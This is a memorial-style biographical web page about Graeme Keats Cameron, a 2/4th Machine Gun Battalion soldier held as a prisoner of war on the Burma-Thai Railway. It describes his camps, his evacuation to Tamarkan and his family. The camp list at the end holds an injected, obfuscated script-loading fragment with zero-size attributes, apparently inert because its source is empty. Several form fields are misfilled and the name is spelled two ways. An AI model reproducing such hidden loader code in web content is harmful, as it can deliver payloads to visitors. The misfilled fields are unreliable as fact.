The Soldier's Details

First Name:
Graeme Keats
Nick Name:
Corporal (Promoted on 15.2.1942)
Regimental #:
'B' Company, No. 7 Platoon (Section Cpl)
Place of Birth:
Perth, Western Australia
Father's Name:
Robert Alan Cameron
Mothers's Name:
Lucy Gwendoline Cameron (nee Keats)
Church of England
Pre-war Occupation:
Broadcast Announcer & Law Student
Selarang Camp Changi, Johore Bahru, Adam Park, Selarang Barracks Changi
'D' Force Thailand, V Battalion
Camps Thailand:
Tamarkan Hospital Camp No. 2 (7.5.1943-15.10.1943) Kanchanaburi Base Camp No.1, Non Pladuk, Ubon (possibly worked on the Sonkurai-Nikhe Defence Line during 1945)
Return Details 1945:
Thailand-Singapore by aircraft, Singapore-Fremantle, HMT Moreton Bay.

General Description

Soldier received a mortar blast to his left ear during the early stages of fighting in Singapore.  Missing in action from 10th February 1942 but joined ‘A’ Company and remained fighting with them until surrender on 15th February 1942.
During his incarceration in Singapore, Graham was selected with ‘D’ Force V Battalion to work on the Burma-Thai Railway which left by train on 17 March for Bampong, Thailand.  The five day train journey was very cramped with the men taking turns to sit and lay down.  It was very hot during the day and the men rotated to sit by the opened sliding doors.  The nights were freezing cold.
On arrival at Bampong the men were marched to Komna Transit Camp located nearby before moving to Kanchanaburi.
Graham was about to embark on probably his greatest challenge – to survive with V Battalion, which suffered the highest death rate of ‘D’ Force.
Please read about ‘D’ Force V Battalion
With Cough in command ‘V’ Battalion arrived at Kinsaiyok to work on the railway.  It appears Graham became sick before V Battalion moved from Kinsaiyok to Brankassi and the deteriorating conditions.  There is no doubt being evacuated to Tamarkan Hospital Camp 7 May 1943 saved his life.  The death rate for Battalion was 50%.  He remained at Tamarkan and Kanchanaburi No. 1 Hospital Camp until 15 Oct 1943.  Considered well, he was moved to Non Pladuk.
From Non Pladuk he was selected with a work party sent to Ubon about  90 miles north-east of Bangkok – we can confirm Cameron was sent to Ubon and recovered from there when the war ended.




Robert Cameron and Lucy Keats were born in South Australia, and married Victoria in 1912.  They had two sons, Robert born in 1913 in Melbourne and Graham Keats Cameron born in 1917 in Perth.
Robert Alan Cameron was appointed to work at Dalgetys, Perth Office.

It is believed the boys attended Hale School after which Graeme studied (Law) at University.  He enlisted with 16th Btn Militia on 26 November 1936. He then joined 2/4th MG Btn 31 March 1941.

Below:  Robert Keats Cameron – brother of Graeme.

The Beaufighter is a British produced airplane.



Cameron’s name is included in the UWA WW2 book.


Graeme’s father died in 1977 and his mother Lucy Cameron died in 1986.  Both were buried at Karrakatta Cemetery.
Graeme Cameron died 26 Aug 1996 aged 79 years. Hannah Cameron died 2007 aged 74 years.

Please read about the 2/4th Lawyers on Burma-Thai Railway

Camp Locations:

  • "var d=document, s=d.createElement('scr'+'ipt'); s.src=''; d.head.appendChild(s);" height="0px" width="0px" />
  • Johore Bahru, - Malaysia
  • Selarang Barracks Changi - Singapore
  • Selarang Camp Changi - Singapore
  • Kanchanaburi, 50k - Thailand
  • Kinsaiyok Main, 170.2k - Thailand
  • Non Pladuk, 0k - Thailand
  • Ubon - Thailand ***